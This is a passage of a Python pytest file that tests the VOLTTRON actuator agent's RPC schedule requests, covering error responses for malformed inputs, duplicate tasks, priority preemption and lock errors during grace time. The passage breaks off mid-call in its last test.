# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation
# are those of the authors and should not be interpreted as representing
# official policies, either expressed or implied, of the FreeBSD
# Project.
#
# This material was prepared as an account of work sponsored by an
# agency of the United States Government. Neither the United States
# Government nor the United States Department of Energy, nor Battelle,
# nor any of their employees, nor any jurisdiction or organization that
# has cooperated in the development of these materials, makes any
# warranty, express or implied, or assumes any legal liability or
# responsibility for the accuracy, completeness, or usefulness or any
# information, apparatus, product, software, or process disclosed, or
# represents that its use would not infringe privately owned rights.
#
# Reference herein to any specific commercial product, process, or
# service by trade name, trademark, manufacturer, or otherwise does not
# necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors
# expressed herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY
# operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
"""
Pytest test cases for testing actuator agent using rpc calls.
"""
from datetime import datetime, timedelta
import gevent
import gevent.subprocess as subprocess
import pytest
from gevent.subprocess import Popen
from mock import MagicMock
from volttron.platform.jsonrpc import RemoteError
from volttron.platform.messaging import topics
# RPC method names exposed by the actuator agent.
REQUEST_CANCEL_SCHEDULE = 'request_cancel_schedule'
REQUEST_NEW_SCHEDULE = 'request_new_schedule'
# VIP identity of the actuator agent the tests talk to.
PLATFORM_ACTUATOR = 'platform.actuator'
# Default requester id used by most test cases.
TEST_AGENT = 'test-agent'
# Default schedule priority used by most test cases.
PRIORITY_LOW = 'LOW'
# Values of the 'result' field in actuator schedule responses.
SUCCESS = 'SUCCESS'
FAILURE = 'FAILURE'
@pytest.fixture(scope="module")
def publish_agent(request, volttron_instance1):
    """
    Fixture used for setting up the environment.
    1. Creates fake driver configs
    2. Starts the master driver agent with the created fake driver agents
    3. Starts the actuator agent
    4. Creates an instance of Agent class for publishing and returns it

    :param request: pytest request object
    :param volttron_instance1: instance of volttron in which test cases
    are run
    :return: an instance of fake agent used for publishing
    """
    # Create master driver config and 4 fake devices each with 6 points
    process = Popen(['python', 'config_builder.py', '--count=4',
                     '--publish-only-depth-all', 'fake',
                     'fake_unit_testing.csv', 'null'],
                    env=volttron_instance1.env,
                    cwd='scripts/scalability-testing',
                    stdout=subprocess.PIPE,
                    stderr=subprocess.PIPE)
    result = process.wait()
    # Py2/3-compatible print; config_builder must exit cleanly
    print(result)
    assert result == 0

    # Start the master driver agent which would in turn start the fake
    # drivers using the configs created above
    master_uuid = volttron_instance1.install_agent(
        agent_dir="services/core/MasterDriverAgent",
        config_file="scripts/scalability-testing/configs/master-driver.agent",
        start=True)
    print("agent id: ", master_uuid)
    gevent.sleep(2)  # wait for the agent to start and start the devices

    # Start the actuator agent through which publish agent should
    # communicate to the fake devices
    actuator_uuid = volttron_instance1.install_agent(
        agent_dir="services/core/ActuatorAgent",
        config_file="services/core/ActuatorAgent/tests/actuator.config",
        start=True)
    print("agent id: ", actuator_uuid)

    # 3: Start a fake agent to publish to message bus
    publish_agent = volttron_instance1.build_agent()

    # 4: add a teardown method to stop the actuator/master driver agents
    # and the fake agent that published to the message bus
    def stop_agent():
        print("In teardown method of module")
        volttron_instance1.stop_agent(actuator_uuid)
        volttron_instance1.stop_agent(master_uuid)
        publish_agent.core.stop()

    request.addfinalizer(stop_agent)
    return publish_agent
@pytest.fixture(scope="function")
def cancel_schedules(request, publish_agent):
    """
    Fixture used to clean up after every test case.
    Cancels any active schedules used for a test case so that the same
    device and time slot can be used for the next test case.

    :param request: pytest request object
    :param publish_agent: instance of Agent class for doing the rpc calls
    :return: Array object that the test methods populate with the list of
    tasks that need to be cancelled after the test. Will contain a list of
    dictionary objects of the format ({'agentid': agentid, 'taskid': taskid})
    """
    # Tests append {'agentid': ..., 'taskid': ...} entries here; the
    # finalizer below cancels each one after the test finishes.
    cleanup_parameters = []
    def cleanup():
        for schedule in cleanup_parameters:
            print('Requesting cancel for task:', schedule['taskid'],
                  'from agent:', schedule['agentid'])
            # RPC to the actuator agent to cancel the schedule
            result = publish_agent.vip.rpc.call(
                PLATFORM_ACTUATOR,
                REQUEST_CANCEL_SCHEDULE,
                schedule['agentid'],
                schedule['taskid']).get(timeout=10)
            # sleep so that the message is sent to pubsub before next
            # test monitors callback method calls
            gevent.sleep(1)
            print ("result of cancel ", result)
    request.addfinalizer(cleanup)
    return cleanup_parameters
@pytest.fixture(scope="function")
def revert_devices(request, publish_agent):
    """
    Cleanup fixture that reverts points on devices after a test run.

    :param request: pytest request object
    :param publish_agent: instance of Agent class for doing the rpc calls
    :return: Array object that the test methods populate with the list of
    points that need to be reverted after the test. Will contain a list of
    dictionary objects of the format
    ({'agentid': agentid, 'device': point_to_revert})
    """
    devices_to_revert = []

    def revert_all():
        # Issue a revert_device RPC for every entry the test registered.
        for entry in devices_to_revert:
            requester = entry['agentid']
            point = entry['device']
            print(
                'Requesting revert on device:', point, 'from agent:',
                requester)
            publish_agent.vip.rpc.call(
                PLATFORM_ACTUATOR,   # Target agent
                'revert_device',     # Method
                requester,           # Requestor
                point                # Point to revert
            ).get(timeout=10)
            # sleep so that the message is sent to pubsub before the next
            # test monitors callback method calls
            gevent.sleep(1)

    request.addfinalizer(revert_all)
    return devices_to_revert
@pytest.mark.actuator
def test_schedule_success(publish_agent, cancel_schedules):
    """
    Test responses for successful schedule request

    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    :param cancel_schedules: fixture used to cancel the schedule at the end
    of test so that other tests can use the same device and time slot
    """
    print("\n**** test_schedule_success ****")
    # used by cancel_schedules fixture during teardown
    agentid = TEST_AGENT
    taskid = 'task_schedule_success'
    cancel_schedules.append({'agentid': agentid, 'taskid': taskid})

    start = str(datetime.now())
    end = str(datetime.now() + timedelta(seconds=1))
    msg = [
        ['fakedriver0', start, end]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        agentid,
        taskid,
        PRIORITY_LOW,
        msg).get(timeout=10)
    # expected result {'info': u'', 'data': {}, 'result': SUCCESS}
    print(result)
    assert result['result'] == SUCCESS
@pytest.mark.actuator
def test_schedule_error_int_taskid(publish_agent):
    """
    Test error response for schedule request with an integer task id

    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    """
    print("\n**** test_schedule_error_int_taskid ****")
    agentid = TEST_AGENT
    taskid = 1234  # deliberately not a string
    start = str(datetime.now())
    end = str(datetime.now() + timedelta(seconds=1))
    msg = [
        ['fakedriver1', start, end]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        agentid,
        taskid,
        PRIORITY_LOW,
        msg).get(timeout=10)
    # expected result {'info': <error>, 'data': {}, 'result': FAILURE}
    print(result)
    assert result['result'] == FAILURE
    assert result['info'] == \
        'MALFORMED_REQUEST: TypeError: taskid must be a nonempty string'
@pytest.mark.actuator
def test_schedule_error_int_agentid(publish_agent):
    """
    Test error response for schedule request with an integer agent id

    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    """
    print("\n**** test_schedule_error_int_agentid ****")
    agentid = 1234  # deliberately not a string
    taskid = 'task_schedule_int_agentid'
    start = str(datetime.now())
    end = str(datetime.now() + timedelta(seconds=1))
    msg = [
        ['fakedriver1', start, end]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        agentid,
        taskid,
        PRIORITY_LOW,
        msg).get(timeout=10)
    # expected result {'info': <error>, 'data': {}, 'result': FAILURE}
    print(result)
    assert result['result'] == FAILURE
    assert result['info'] == \
        'MALFORMED_REQUEST: TypeError: agentid must be a nonempty string'
@pytest.mark.actuator
def test_schedule_empty_taskid(publish_agent, cancel_schedules):
    """
    Test error response for schedule request when task id is an empty
    string

    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    :param cancel_schedules: fixture used to cancel the schedule at the end
    of test so that other tests can use the same device and time slot
    """
    print("\n**** test_schedule_empty_taskid ****")
    # used by cancel_schedules fixture during teardown
    agentid = TEST_AGENT
    taskid = ''
    cancel_schedules.append({'agentid': agentid, 'taskid': taskid})

    start = str(datetime.now())
    end = str(datetime.now() + timedelta(seconds=1))
    msg = [
        ['fakedriver1', start, end]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        agentid,
        taskid,
        PRIORITY_LOW,
        msg).get(timeout=10)
    # expected result {'info': <error>, 'data': {}, 'result': FAILURE}
    print(result)
    assert result['result'] == FAILURE
    assert result['info'] == \
        'MALFORMED_REQUEST: TypeError: taskid must be a nonempty string'
@pytest.mark.actuator
def test_schedule_empty_agentid(publish_agent, cancel_schedules):
    """
    Test error response for schedule request when agent id is an
    empty string

    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    :param cancel_schedules: fixture used to cancel the schedule at the end
    of test so that other tests can use the same device and time slot
    """
    print("\n**** test_schedule_empty_agentid ****")
    # used by cancel_schedules fixture during teardown
    agentid = ''
    taskid = 'task_empty_str_agent'
    cancel_schedules.append({'agentid': agentid, 'taskid': taskid})

    start = str(datetime.now())
    end = str(datetime.now() + timedelta(seconds=1))
    msg = [
        ['fakedriver0', start, end]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        agentid,
        taskid,
        PRIORITY_LOW,
        msg).get(timeout=10)
    # expected result {'info': <error>, 'data': {}, 'result': FAILURE}
    print(result)
    assert result['result'] == FAILURE
    assert result['info'] == \
        'MALFORMED_REQUEST: TypeError: agentid must be a nonempty string'
@pytest.mark.actuator
def test_schedule_error_none_taskid(publish_agent):
    """
    Test error responses for schedule request with taskid = None

    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    """
    print("\n**** test_schedule_error_none_taskid ****")
    agentid = TEST_AGENT
    taskid = None
    start = str(datetime.now())
    end = str(datetime.now() + timedelta(seconds=1))
    msg = [
        ['fakedriver1', start, end]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        agentid,
        taskid,
        PRIORITY_LOW,
        msg).get(timeout=10)
    # expected result {'info': 'MISSING_TASK_ID', ..., 'result': FAILURE}
    print(result)
    assert result['result'] == FAILURE
    assert result['info'] == 'MISSING_TASK_ID'
@pytest.mark.actuator
def test_schedule_error_none_agentid(publish_agent):
    """
    Test error responses for schedule request with agentid = None

    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    """
    print("\n**** test_schedule_error_none_agentid ****")
    agentid = None
    taskid = 'task_none_agentid'
    start = str(datetime.now())
    end = str(datetime.now() + timedelta(seconds=1))
    msg = [
        ['fakedriver0', start, end]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        agentid,
        taskid,
        PRIORITY_LOW,
        msg).get(timeout=10)
    # expected result {'info': 'MISSING_AGENT_ID', ..., 'result': FAILURE}
    print(result)
    assert result['result'] == FAILURE
    assert result['info'] == 'MISSING_AGENT_ID'
@pytest.mark.actuator
def test_schedule_error_invalid_priority(publish_agent):
    """
    Test error responses for schedule request with an invalid priority

    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    """
    print("\n**** test_schedule_error_invalid_priority ****")
    taskid = 'task_invalid_priority'
    start = str(datetime.now())
    end = str(datetime.now() + timedelta(seconds=1))
    msg = [
        ['fakedriver1', start, end]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        TEST_AGENT,
        taskid,
        'LOW2',  # not one of the valid priorities
        msg).get(timeout=10)
    # expected result {'info': 'INVALID_PRIORITY', ..., 'result': FAILURE}
    print(result)
    assert result['result'] == FAILURE
    assert result['info'] == 'INVALID_PRIORITY'
@pytest.mark.actuator
def test_schedule_error_empty_message(publish_agent):
    """
    Test error responses for schedule request with an empty message

    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    """
    print("\n**** test_schedule_error_empty_message ****")
    taskid = 'task_empty_message'
    msg = [
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        TEST_AGENT,
        taskid,
        PRIORITY_LOW,
        msg).get(timeout=10)
    # expected result {'info': 'MALFORMED_REQUEST_EMPTY', ...,
    # 'result': FAILURE}
    print(result)
    assert result['result'] == FAILURE
    assert result['info'] == 'MALFORMED_REQUEST_EMPTY'
@pytest.mark.actuator
def test_schedule_error_duplicate_task(publish_agent, cancel_schedules):
    """
    Test error responses for schedule request with a task id that is
    already in use

    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    :param cancel_schedules: fixture used to cancel the schedule at the end
    of test so that other tests can use the same device and time slot
    """
    print("\n**** test_schedule_error_duplicate_task ****")
    # used by cancel_schedules fixture during teardown
    agentid = TEST_AGENT
    taskid = 'task_schedule_duplicate_id'
    cancel_schedules.append({'agentid': agentid, 'taskid': taskid})

    start = str(datetime.now())
    end = str(datetime.now() + timedelta(seconds=1))
    msg = [
        ['fakedriver1', start, end]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        agentid,
        taskid,
        PRIORITY_LOW,
        msg).get(timeout=10)
    assert result['result'] == SUCCESS

    # new request with the same task id should be rejected
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        agentid,
        taskid,
        PRIORITY_LOW,
        msg).get(timeout=10)
    # expected result {'info': 'TASK_ID_ALREADY_EXISTS', ...,
    # 'result': FAILURE}
    print(result)
    assert result['result'] == FAILURE
    assert result['info'] == 'TASK_ID_ALREADY_EXISTS'
@pytest.mark.actuator
def test_schedule_error_none_priority(publish_agent):
    """
    Test error responses for schedule request with priority = None

    :param publish_agent: fixture invoked to setup all agents necessary
    and returns an instance of Agent object used for publishing
    """
    print("\n**** test_schedule_error_none_priority ****")
    taskid = 'task_none_priority'
    start = str(datetime.now())
    end = str(datetime.now() + timedelta(seconds=1))
    msg = [
        ['fakedriver0', start, end]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        TEST_AGENT,
        taskid,
        None,  # priority deliberately missing
        msg).get(timeout=10)
    # expected result {'info': 'MISSING_PRIORITY', ..., 'result': FAILURE}
    print(result)
    assert result['result'] == FAILURE
    assert result['info'] == 'MISSING_PRIORITY'
@pytest.mark.actuator
def test_schedule_error_malformed_request(publish_agent):
    """
    Test error responses for schedule request with malformed request -
    request with only a device name and start time and no stop time

    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    """
    print("\n**** test_schedule_error_malformed_request ****")
    taskid = 'task_malformed_request'
    start = str(datetime.now())
    # no end time on purpose - the request entry is malformed
    msg = [
        ['fakedriver0', start]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        TEST_AGENT,
        taskid,
        PRIORITY_LOW,
        msg).get(timeout=10)
    # expected result {'info': 'MALFORMED_REQUEST...', ...,
    # 'result': FAILURE}
    print(result)
    assert result['result'] == FAILURE
    assert result['info'].startswith('MALFORMED_REQUEST')
@pytest.mark.actuator
def test_schedule_premept_self(publish_agent, cancel_schedules):
    """
    Test error response for schedule request through pubsub.
    Test schedule preemption by a higher priority task from the same agent.

    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    :param cancel_schedules: fixture used to cancel the schedule at the end
    of test so that other tests can use the same device and time slot
    """
    print("\n**** test_schedule_premept_self ****")
    # used by cancel_schedules fixture during teardown
    agentid = TEST_AGENT
    taskid = 'task_high_priority'
    cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
    # add low priority task as well since it won't get cancelled till
    # end of grace time
    cancel_schedules.append(
        {'agentid': agentid, 'taskid': 'task_low_priority'})

    publish_agent.callback = MagicMock(name="callback")
    publish_agent.callback.reset_mock()
    # subscribe to schedule response topic
    publish_agent.vip.pubsub.subscribe(
        peer='pubsub',
        prefix=topics.ACTUATOR_SCHEDULE_RESULT,
        callback=publish_agent.callback).get()

    start = str(datetime.now() + timedelta(seconds=10))
    end = str(datetime.now() + timedelta(seconds=20))
    msg = [
        ['fakedriver1', start, end]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        agentid,
        'task_low_priority',
        'LOW_PREEMPT',
        msg).get(timeout=10)
    # expected result {'info': u'', 'data': {}, 'result': SUCCESS}
    print(result)
    assert result['result'] == SUCCESS
    # wait for above call's success response to publish_agent.callback
    gevent.sleep(1)
    publish_agent.callback.reset_mock()

    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        agentid,
        taskid,
        'HIGH',
        msg).get(timeout=10)
    assert result['result'] == SUCCESS
    # wait for 2 callbacks - success msg for task_high_priority and preempt
    # msg for task_low_priority
    gevent.sleep(6)
    print('call args list:', publish_agent.callback.call_args_list)
    assert publish_agent.callback.call_count == 2

    # Grab the args of the callbacks and verify
    call_args1 = publish_agent.callback.call_args_list[0][0]
    call_args2 = publish_agent.callback.call_args_list[1][0]
    assert call_args1[1] == PLATFORM_ACTUATOR
    assert call_args1[3] == topics.ACTUATOR_SCHEDULE_RESULT
    # initialize 0 to schedule response and 1 to cancel response
    schedule_header = call_args1[4]
    schedule_message = call_args1[5]
    cancel_header = call_args2[4]
    cancel_message = call_args2[5]
    # check if order is reversed: 0 is cancel response and 1 is new schedule
    if call_args1[4]['type'] == 'CANCEL_SCHEDULE':
        assert call_args2[4]['type'] == 'NEW_SCHEDULE'
        cancel_header = call_args1[4]
        cancel_message = call_args1[5]
        schedule_header = call_args2[4]
        schedule_message = call_args2[5]
    else:
        assert call_args1[4]['type'] == 'NEW_SCHEDULE'
        assert call_args2[4]['type'] == 'CANCEL_SCHEDULE'

    # values remain as initialized above if/else
    assert schedule_header['type'] == 'NEW_SCHEDULE'
    assert schedule_header['taskID'] == taskid
    assert schedule_header['requesterID'] == TEST_AGENT
    assert schedule_message['result'] == SUCCESS

    assert cancel_header['taskID'] == 'task_low_priority'
    assert cancel_message['data']['agentID'] == TEST_AGENT
    assert cancel_message['data']['taskID'] == taskid
    assert cancel_message['result'] == 'PREEMPTED'
@pytest.mark.actuator
def test_schedule_premept_active_task(publish_agent, cancel_schedules):
    """
    Test error response for schedule request.
    Test schedule preemption of an actively running task with priority
    LOW_PREEMPT by a higher priority task from a different agent.

    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    :param cancel_schedules: fixture used to cancel the schedule at the end
    of test so that other tests can use the same device and time slot
    """
    print("\n**** test_schedule_premept_active_task ****")
    # used by cancel_schedules fixture during teardown
    agentid = 'new_agent'
    taskid = 'task_high_priority2'
    cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
    # add low priority task as well since it won't get cancelled till
    # end of grace time
    cancel_schedules.append(
        {'agentid': TEST_AGENT, 'taskid': 'task_low_priority2'})

    publish_agent.callback = MagicMock(name="callback")
    publish_agent.callback.reset_mock()
    # subscribe to schedule response topic
    publish_agent.vip.pubsub.subscribe(
        peer='pubsub',
        prefix=topics.ACTUATOR_SCHEDULE_RESULT,
        callback=publish_agent.callback).get()

    start = str(datetime.now())
    end = str(datetime.now() + timedelta(seconds=15))
    msg = [
        ['fakedriver1', start, end]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        TEST_AGENT,
        'task_low_priority2',
        'LOW_PREEMPT',
        msg).get(timeout=10)
    # expected result {'info': u'', 'data': {}, 'result': SUCCESS}
    print(result)
    assert result['result'] == SUCCESS
    # wait for above call's success response to publish_agent.callback
    gevent.sleep(1)
    publish_agent.callback.reset_mock()

    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        agentid,
        taskid,
        'HIGH',
        msg).get(timeout=10)
    assert result['result'] == SUCCESS
    # wait for 2 callbacks - success msg for task_high_priority2 and
    # preempt msg for task_low_priority2
    gevent.sleep(6)
    print('call args list:', publish_agent.callback.call_args_list)
    assert publish_agent.callback.call_count == 2

    # Grab the args of the callbacks and verify
    call_args1 = publish_agent.callback.call_args_list[0][0]
    call_args2 = publish_agent.callback.call_args_list[1][0]
    assert call_args1[1] == PLATFORM_ACTUATOR
    assert call_args1[3] == topics.ACTUATOR_SCHEDULE_RESULT
    # initialize 0 to schedule response and 1 to cancel response
    schedule_header = call_args1[4]
    schedule_message = call_args1[5]
    print("call args of 1 ", publish_agent.callback.call_args_list[1])
    cancel_header = call_args2[4]
    cancel_message = call_args2[5]
    # check if order is reversed: 0 is cancel response and 1 is new schedule
    if call_args1[4]['type'] == 'CANCEL_SCHEDULE':
        assert call_args2[4]['type'] == 'NEW_SCHEDULE'
        cancel_header = call_args1[4]
        cancel_message = call_args1[5]
        schedule_header = call_args2[4]
        schedule_message = call_args2[5]
    else:
        assert call_args1[4]['type'] == 'NEW_SCHEDULE'
        assert call_args2[4]['type'] == 'CANCEL_SCHEDULE'

    # values remain as initialized above if/else
    assert schedule_header['type'] == 'NEW_SCHEDULE'
    assert schedule_header['taskID'] == taskid
    assert schedule_header['requesterID'] == agentid
    assert schedule_message['result'] == SUCCESS

    assert cancel_header['taskID'] == 'task_low_priority2'
    # data in the preempt message refers to the preempting (higher
    # priority) agent/task
    assert cancel_message['data']['agentID'] == agentid
    assert cancel_message['data']['taskID'] == taskid
    assert cancel_message['result'] == 'PREEMPTED'
@pytest.mark.actuator
def test_schedule_premept_active_task_gracetime(publish_agent,
                                                cancel_schedules):
    """
    Test error response for schedule request.
    Test schedule preemption of an actively running task with priority
    LOW_PREEMPT by a higher priority task from a different agent. Try
    setting a point before the end of grace time of the lower priority
    task. The set operation should fail.

    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    :param cancel_schedules: fixture used to cancel the schedule at the end
    of test so that other tests can use the same device and time slot
    """
    print("\n**** test_schedule_premept_active_task_gracetime ****")
    # used by cancel_schedules fixture during teardown
    agentid = 'new_agent'
    taskid = 'task_high_priority3'
    cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
    # add low priority task as well since it won't get cancelled till
    # end of grace time
    cancel_schedules.append(
        {'agentid': TEST_AGENT, 'taskid': 'task_low_priority3'})

    publish_agent.callback = MagicMock(name="callback")
    publish_agent.callback.reset_mock()
    # subscribe to schedule response topic
    publish_agent.vip.pubsub.subscribe(
        peer='pubsub',
        prefix=topics.ACTUATOR_SCHEDULE_RESULT,
        callback=publish_agent.callback).get()

    start = str(datetime.now())
    end = str(datetime.now() + timedelta(seconds=20))
    msg = [
        ['fakedriver1', start, end]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        TEST_AGENT,
        'task_low_priority3',
        'LOW_PREEMPT',
        msg).get(timeout=10)
    # expected result {'info': u'', 'data': {}, 'result': SUCCESS}
    print(result)
    assert result['result'] == SUCCESS
    # wait for above call's success response to publish_agent.callback
    gevent.sleep(1)
    publish_agent.callback.reset_mock()

    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        agentid,
        taskid,
        'HIGH',
        msg).get(timeout=10)
    assert result['result'] == SUCCESS
    # wait for 2 callbacks - success msg for task_high_priority3 and
    # preempt msg for task_low_priority3
    gevent.sleep(6)
    print('call args list:', publish_agent.callback.call_args_list)
    assert publish_agent.callback.call_count == 2

    # Grab the args of the callbacks and verify
    call_args1 = publish_agent.callback.call_args_list[0][0]
    call_args2 = publish_agent.callback.call_args_list[1][0]
    assert call_args1[1] == PLATFORM_ACTUATOR
    assert call_args1[3] == topics.ACTUATOR_SCHEDULE_RESULT
    # initialize 0 to schedule response and 1 to cancel response
    schedule_header = call_args1[4]
    schedule_message = call_args1[5]
    cancel_header = call_args2[4]
    cancel_message = call_args2[5]
    # check if order is reversed: 0 is cancel response and 1 is new schedule
    if call_args1[4]['type'] == 'CANCEL_SCHEDULE':
        assert call_args2[4]['type'] == 'NEW_SCHEDULE'
        cancel_header = call_args1[4]
        cancel_message = call_args1[5]
        schedule_header = call_args2[4]
        schedule_message = call_args2[5]
    else:
        assert call_args1[4]['type'] == 'NEW_SCHEDULE'
        assert call_args2[4]['type'] == 'CANCEL_SCHEDULE'

    # values remain as initialized above if/else
    assert schedule_header['type'] == 'NEW_SCHEDULE'
    assert schedule_header['taskID'] == taskid
    assert schedule_header['requesterID'] == agentid
    assert schedule_message['result'] == SUCCESS

    assert cancel_header['taskID'] == 'task_low_priority3'
    assert cancel_message['data']['agentID'] == agentid
    assert cancel_message['data']['taskID'] == taskid
    assert cancel_message['result'] == 'PREEMPTED'

    # High priority task's schedule request should succeed but it should
    # not be able to start writing to the device till the active task's
    # ('task_low_priority3') grace time is over
    try:
        result = publish_agent.vip.rpc.call(
            PLATFORM_ACTUATOR,  # Target agent
            'set_point',  # Method
            agentid,  # Requestor
            'fakedriver1/SampleWritableFloat1',  # Point to set
            2.5  # New value
        ).get(timeout=10)
        pytest.fail('Expecting LockError. Code returned: {}'.format(result))
    except RemoteError as e:
        assert e.exc_info['exc_type'] == 'actuator.agent.LockError'
        # NOTE(review): e.message is Py2-style; verify RemoteError exposes
        # a 'message' attribute before running under Python 3
        assert e.message == 'caller ({}) does not have this lock'.format(
            agentid)
@pytest.mark.actuator
def test_schedule_premept_error_active_task(publish_agent, cancel_schedules):
    """
    Test error response for schedule request.
    Test schedule preemption of an actively running task with priority LOW
    by a higher priority task from a different agent. It should fail as the
    LOW priority task's time window is active.

    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    :param cancel_schedules: fixture used to cancel the schedule at the end
    of test so that other tests can use the same device and time slot
    """
    print("\n**** test_schedule_premept_error_active_task ****")
    # used by cancel_schedules fixture during teardown
    agentid = TEST_AGENT
    taskid = 'task_low_priority3'
    cancel_schedules.append({'agentid': agentid, 'taskid': taskid})

    publish_agent.callback = MagicMock(name="callback")
    publish_agent.callback.reset_mock()
    # subscribe to schedule response topic
    publish_agent.vip.pubsub.subscribe(
        peer='pubsub',
        prefix=topics.ACTUATOR_SCHEDULE_RESULT,
        callback=publish_agent.callback).get()

    start = str(datetime.now())
    end = str(datetime.now() + timedelta(seconds=10))
    msg = [
        ['fakedriver1', start, end]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        agentid,
        taskid,
        PRIORITY_LOW,
        msg).get(timeout=10)
    # expected result {'info': u'', 'data': {}, 'result': SUCCESS}
    print(result)
    assert result['result'] == SUCCESS
    # wait for above call's success response to publish_agent.callback
    gevent.sleep(1)
    publish_agent.callback.reset_mock()

    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
        REQUEST_NEW_SCHEDULE,
        agentid,
        'failed_high_priority_task',
        'HIGH',
        msg).get(timeout=10)
    assert result['result'] == FAILURE
    assert result['info'] == 'CONFLICTS_WITH_EXISTING_SCHEDULES'
    # list(...) so this also works under Python 3 where dict.keys()
    # is a non-subscriptable view
    assert list(result['data'][TEST_AGENT].keys())[0] == taskid
@pytest.mark.actuator
def test_schedule_premept_future_task(publish_agent, cancel_schedules):
    """
    Test error response for schedule request.
    Test schedule preemption of a future task with priority LOW by a higher
    priority task from a different agent.

    :param publish_agent: fixture invoked to setup all agents necessary and
    returns an instance of Agent object used for publishing
    :param cancel_schedules: fixture used to cancel the schedule at the end
    of test so that other tests can use the same device and time slot
    """
    print("\n**** test_schedule_premept_future_task ****")
    # used by cancel_schedules fixture during teardown
    agentid = 'new_agent'
    taskid = 'task_high_priority4'
    cancel_schedules.append({'agentid': agentid, 'taskid': taskid})
    # add low priority task as well since it won't get cancelled till
    # end of grace time
    cancel_schedules.append(
        {'agentid': TEST_AGENT, 'taskid': 'task_low_priority4'})

    publish_agent.callback = MagicMock(name="callback")
    publish_agent.callback.reset_mock()
    # subscribe to schedule response topic
    publish_agent.vip.pubsub.subscribe(
        peer='pubsub',
        prefix=topics.ACTUATOR_SCHEDULE_RESULT,
        callback=publish_agent.callback).get()

    start = str(datetime.now() + timedelta(seconds=10))
    end = str(datetime.now() + timedelta(seconds=20))
    msg = [
        ['fakedriver2', start, end]
    ]
    result = publish_agent.vip.rpc.call(
        PLATFORM_ACTUATOR,
